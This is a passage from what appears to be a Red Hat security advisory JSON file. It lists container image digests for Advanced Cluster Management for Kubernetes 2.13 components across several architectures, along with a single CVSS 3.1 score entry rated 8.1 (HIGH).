"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:bc06192ce81eac533cb7c080e8aef6587991534cb9b1787537c49753c0985e3d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:e8207895ec9e7006746043cf04fbf1e2897aa30e74b9184665be2ac50f9fe650_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:3074a430dd8bbb0399ce649186cb6140d8525e5b7c1e05b79a4ab74a32d989b8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:34de933b36ee01444cdf4d4a45e47466ef8dad6ab6345134524595c191928ffe_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:8a65d646180c7889d0ba1e3a11fd6796d0020301e4e721575f87585afd8f9dfe_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:cf1b6cae5a10aec88554e71be094737b0a17efb07cd1175ca55f1799626f58f2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:036ee3882d4d6536c309d9aacea3dc611785deba3bd998092adcb1ba21664897_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:82914e82513e2f8522589886a5df6681d12c6442ff1b8ef05a21d31c09fa0f0d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:893831b7270214137b2fdf1e55f0175b4ef6de9b8763eaaf0e0a935c8ab1744d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d6e329af2d9c1648006e3fa0b0232562a2bed6e7a33c56e025517f7d9068b5cc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:131918c9878d040c3ec190a9c724a65dbf3bb27f55a0fcac250d92067dc69288_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:327af8db145b9bd6ada1c9f27faa493ce090af412c51dedd7b247e65dcad51fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:721ebc57b91b4f9bcfb25d7b29ee8a2ca60fcb231096af2812f9201778e3ca51_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:ebff3dd368f33d1aec215b947b88f4aa7e821db1577d448b8c6eb4e6ead7fe07_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:6a88ce891e0fc9619e983a5b63fef86f735b8df5eb56909075bd3bbb098dddf8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:7485348cced991c7a4399e21e077ed62b3a118b7093bd4f42f9863d9e0da5c26_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:b8d70910405eec4d886b27fc348a982c0b6f906f7f0e65aceecffd9f09fd6602_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:e63891386bfb191cd0e74884cad1f86c462d57e51b9aeec7d9c5073ba4d723f9_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:01382838a23f75a6c03b30c68e9e42d72c22d773a4891260c639f7c8b60ffd87_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:1c74aaa66b6be9f5eb1f55851f1cc3f2a3878882c3fc972cd24232e9022f74e2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:696d1f7c4b5415e49760f7a66368aa0260284b12b108d5feb560838a9bce8a6f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7328602aa637f1b555ecd56c05d6ade8dbee48fae78a0118b1e39774b8383704_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:3ae25beb920ec77de14769895f60da6a3d83fc41192ca5da5f976076853e5a50_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:c9bf774dfa3f5a66339a86f22961c54b2b41199efd173b016a2c7c57407dae40_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:d1cac9d50ec20e770ae41aa8f90474c269d80e84a9990e2c3e613a892b0c044c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:ddb5d8c476bcc9b6d4a7c0d116a2f5150acbfa80cc890d77d5d90bd496a7860e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:0ffd5a902860aad15377e20b1e6481e6cf746fa3e33509df0f88f93f9a9f8034_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:abcf4d6f42dec254d8b4197282fb449daf13d4724ed23ddc2aafde0328338f74_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b6ea1f6389ad207c45321ab5a36c03949986e74ef9dbf5e3d2fdb2ceb5c4a602_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:e126327d69e48f2844f5beafc34514d31e9f3eed0ac393399edf80cf31a2eabe_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:0f7b1ee143f154e6e33c452f95fd0a0afb7fd020e758a991d18abde990e49e0c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:6363dfb96f394aef2b07b3a36c85d3af60dc3594ab615327176ba520704a4356_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:849cf23afa514a1d86073fed2424e487893655510721a0b9c0d4be4cf59bf60b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:a8843c7b628767803f2aa4b2658dc0a932157b20f98507004929036108c7dfb2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:428a52072881ee7714539f7721313ca78e06fd0e39ceb8de12f8a0d33fb4cd55_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:5145c15e9fa57bdd1d072e7c88f27d5f8f51caf395e542ad8fb54a098f8c24fb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:cb76c81b895dfb5bc384407baf76c5c74d9b509342e665f3d5ff234a40f16236_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:d7dae765d402cd9522c23689fc0e72f47659fc2f1184b8b16c51b6c5c6a2b890_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:5af546f1d36b01b320fd950d227cdd8f62a765facc8614ba277fe218c5649e61_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:921a7995304e4648ac2fd0c08bec7d95adc09caca4d6d124cbba4ff8043edf19_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:a0928fa238b82f2c00778064d0f1e52ff507ffef7a0a3756b1f2f2022d375e4b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:fdc436ea03cb2d06976da109061aa0793672c306deef23708ee9e0b39395b6f7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:2adb87f4433d9516e2111150bccafbbb8dec179bdf3fe3acd38d7b27411cb666_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:4afad9568dc7dd2d90c396d08d596258e813bb67e2901135b539f279af382e09_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:508d4d8ee312e8d720eeca38f3823438548c5ab1260d8fa822ca49765f7aeef5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:a31ab1ae8b4c3ead24f9ce3c913a4754972bd548d6e5b10ca22e61a6d9d3539a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:35ba01a14b8f7a0ed0e79fd9efe48280d26afa10a316daaec512f39cc6839adb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:384d23bb3f4e6fd2425e1b60ded99f027dcbaad14e631ffbe84845821a1c3215_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:a8ca367caa43ec006811fe370fdf440328dd22fc39be11e48f36396b781f36bb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:db8b5776a9dcb4b87a4de948c4c11d0164e66df188f97be6a6fd7e9953f5501e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:1e0a1eadbb77f4f14d48357af6a5b12406ae912210b53c14018b642e4f62d1fe_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:4816e73043b8f73143cff29cff41292e62bb36467ba28a260ee46fd43ece915c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:71d6b8f5471d7a23918763eeea53d991d98adf170e228348b77d2412ce752751_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:87f2e1ee942b226835c97b7abe43a62802146755141a850137b9ab03dd6fccf6_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:2b6a43ae23126321b9c94b37da646db4943331200434edc6a54be156150065f2_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:d24283b13f739561fae6bdfb730922a1d3804422dc41249e33e6084158afcec4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:e9df0b0323447cacad8942ecce2e690a9f498d5cb41b54e3bb55be6614ddaece_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:ed46808dba295cf093aa5caabc9782ee9f044c7e770adaf3657f57f0f6e1aaf9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:5a98450b5f85a75172ca51e2dcf096465635dc2e4c5fedfd74e1fdd665f3fa65_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:7388c812f31ff8f2b1c2653adf07906e2f50c356a1ad9130d3923d835e79e0e7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:bd521270153c8b5b8193e08fe4a7c959e5b9d22ed7e74a87827580974b3836f1_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:fc3b40899a332c041667de0965d58f50325eaddc8547145a2dff9aede38d69bb_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0668bbb16723e23ae64e4337a1347a6e0d2854d1c173cbc59c17a829e430bc00_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:177c2cb59b6b43f4ea650bbb603b144ca37aece398635a458d518dd55cae7fb6_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:78b0d35ce4fce4d279ad089ccf284f5e1425f947d95c3c72c5755bb00464305c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:f3b200f2a00217299f66cab9f89de8673003d194292b41157f663799b5c61c3e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:02486920d371f14bcbafc720545c4a6f24523a46483e60c00c7f25f52b3ea476_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:1cb3639dfe65b6568b53de130e7b36b8f5ebceedd76c110ddb64fbe860bfde14_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:4124ae57ffa1b26bfc0e68b62c8325c5e17d332dca85b618a4ccba60cf52d1b5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:8243cc9646e4ae89aabf299e476a94124c8244dd54e0fb1c848a6bbbd0c94f62_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:2a64ce4183df6c5743ffa7df7b4192fce192e08eea5e03b76c9b621e5d351d2a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:4e6dd9d24ab247b2a7b84f7842b2a710eee3aa2fce58fc1516ef5bb55e0693f0_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:d814b3c076f9ef671d74e156dce5d3f634130904f166a6a04a59df41e8ec07ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:faeaa0d157334dcf9a808ea8916272c9912726580dc0ca06b6e3bb85860772ab_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:2bc6310bd61774d74b1dd0245139b3bfc4940efb1bf424ad0e7a4d822f2271b8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:95baf4ac24b7c9d2fb2883cdf81c7d75f76c8c53aef6745eb732918718877cd4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c17ac85849d3cdf437d09d8ce9581b48a73304498a315db470ec655fdb88f529_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f6dcad139d0a85137a293dd7cf8c68819658d71a1a45914030cfb7d58dac146d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:1ef6867542269af4ce8cee7225dfb4e64680715a1bb34ed510b9fbf84d88fb2d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:58a418395bf71e339145d259b6906172fbc066e17e05071ce983c5615e703075_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:81f72d7522fcc4a0e948e52987671328dcbfd726b54125a23d893cd45e6cbdd5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:f4ad6f2ed37be694b95b1c00b32f797cc29a0dab790207a254b4d4f4f2aa7158_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:723dd5b7b166ed9fcedd2f6b2b2567e943ffcfa78bfe7974ac410d629495bc27_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:7f20f9bb4a9b57b618fd864fd49ef0b1a1cb81d20668ba9f1bb2392086d7a144_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b3b5013c3333ed731561416060e14930f276336fb23037c6a7109496faee095e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:ccc5e9181f23112628ee91c9acc577627a501af9bb170b2bf0eb0837811e7328_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:0bd1b50f01e6228c56cf07c005ac8ead15d814b09813157b79fcea9292e42551_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:82107bc3ac83308ba96111cc5690a23d116bcd71c7a65face89e4d530b2e8382_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:a673e83cb652160fc3db1b69505d21a634a15fcc68f3940bda25f64dc0ae7bb6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:a765f440d03be4c90a764f6ec1a2bf2d4c4acb0f8af630aff9811aaa631327ca_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:e8b775e29dbba36821b79231e35017cefd5bb6d245dd1c2d8004150c4998a89c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:eaa602fc272af9fce6ea4b2b2e700e24fc29b7fcaad3437abc73f247a5f994aa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:ef6cd34e8f03c566dea492474495c0142a506b973b1a1ae00667de2993c88209_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:fbf35da688ccf2c7049320cee23dcbc518d2787d52c78574ff44e481a38ec20f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:38a4caea83181ce3f04956654ed3e2241a4563718a66ddf09eb0997afe47e0ce_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:54d57a40c0ebc2b7922552aff95b6219c10c4f1b27627d36bc800c1db33a4651_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:8fb71c30e1217f0697c872db2bafbb5e06a7f727c6b508f269512447d6b5118d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:e58abdba80628700eaf2736cb65e6746d2b2126cc7b19ba403c19be5e8a22509_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:83bc597e83bd0756afa67adcbd50858b0d1c23f87b572706e9059dd26055b4a0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:a5ccbff1ad0a3001902044e52590ee18508632bce7822ebf54ba521eaae180eb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:db8ed91f54d683d9d3be3b0747f7429eb95accc8802593dd61d8c24e8a1facfb_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:f3d2daf907e6fd32654d1458c60b134f4d938a933e53161e588bcd94ff6b01df_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:0aa9df5f5bf523f7d6d4a9e931a1932e62056d942bf86396d33874adc85a91e8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:4d0252b36a0ca8f522e60e400463b22de506766bdf0c1f65e3e289a3c93002d1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:701bc2dd0a441216ea138b677dbf71d497d9b7acaad5f48661117008a8e5defe_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:b30887b0c8fb4292b6c87ef681761c18a112e0113647e2bde86c04c13f59b7a5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6b65f79a765b69a84ac5924280e9f6d55875b8aceb6ae97f9a75cb6076bd074a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6d410e7e4de91970f44368e5cc1ce1ac83908550785263342f6038a988be30e4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:736631a4d89bf44078b7f180ddcd474655d66ed43b85a4a79258eab9348656ff_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:ca58b27ea6673f0c506ed1ffad51918608a813dabf58f4845ab97d6e9f2c11d3_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:21f6d86d21be3a9541fc577a647d8f38b81bca975dc82d9506056f44e6a35443_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:60a3e7e83d189003d185e2415f96b4f3be0912e4cbaa96ea4ed8ebcdce5cc1d0_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:796abebd9573cacba87eb0c6497ed9617047eddba90f1c4b8237964ed954328d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:d130f2bb5b047483504d5c8113e0449983e79c49e8bda97b5752862930a91947_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:0a98f4d3e54b7410bfc1601f2ee2ba1308f30e40314bfc5169c3d99c3b8dfaa1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:3148a9662d732bbad15d6bd89cce43a886cba68ba1cefcef55f7bb65d3159432_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33c37b7bd401cfcf46d5cb42173fe3697a0649dc1080255dbd6243d4bfe8d08f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:cf1c1c1c778cafe6067df490969aab89a6b3e43487d954bb24b1409bc22f1091_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:118fe4fc31cb7818cda240c48628e5a3d43002c271fa7ba45d9631b7a6ddb8e2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a2e5353298e0b0e46516d5127d0da65fcb5ac4498651693f347de1eb18e12095_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b10f9f52f0665ae2a8bb4bf2649aa6e3d1185a0dffb9ebeb11a8900174df5ef2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:c2bfb459d7442878d591cc31436830b983fe30dcfa6f7d383cc91cb32e42fa7c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:55320965b17fef48e776d39c548f0bf81a1e9239ee4b90a032f4b111e8748d2f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:a36bcef862d0e3cc972c9eb2c0d80311030659c13de6acab7e353905ff5eccff_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:c7bfe530a7efe66f5c3e2e08b114b3b9e44072e3609725663d6a5f3945bda512_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:e73d91e157c13ea96615fc060f5312997203f6b6350d335917b2feacb96c9ca5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:2003587575e18b2e6b9bf3617c65e0f83ebc8cf30daf6dd241500cd1555820e0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:6098254a7e2fdd67ef1773abda74d3dde3d31e59254f4a1cd5e77dc34d224602_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:7fa35da009ab6e41177f0589f6d3fbf1bbe3fff4b52add3bfbc516a046e35640_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:9418993b725bf813959ed5adbd21690ee2cbeeac3d56c7ab6805c3eb29b5d46f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:14fb16412dea57a775e95954c3a07a77de846f851935629bf9bfdbcc46a70f4f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:40f8ad6430cc767b56992722d5890f98882c7372950320d28e808c18714b7179_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:c227f25ae401af3eba9352765f906c8b873370485a7c748b1602e53c0776f90f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:ffb3e3cd6764e802b5e9f87034548f96dcacfeedd8fe2b3b21b06c41734e8320_arm64",
